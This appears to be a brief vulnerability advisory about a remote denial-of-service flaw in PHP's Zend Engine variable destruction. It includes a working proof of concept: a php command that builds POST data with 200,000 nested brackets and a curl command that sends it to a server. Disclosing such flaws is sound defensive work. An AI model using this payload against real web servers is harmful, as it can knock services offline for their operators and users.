|
PHP ZendEngine Variable Destruction Remote Denial of Service Vulnerability
To exploit this issue, an attacker must be able to execute PHP code on a vulnerable webserver. The following proof-of-concept is available: $ php -r 'echo "a".str_repeat("[]",200000)."=1&a=0";' > postdata $ curl http://www.example.com/ -d @postdata |
|
|
Privacy Statement |
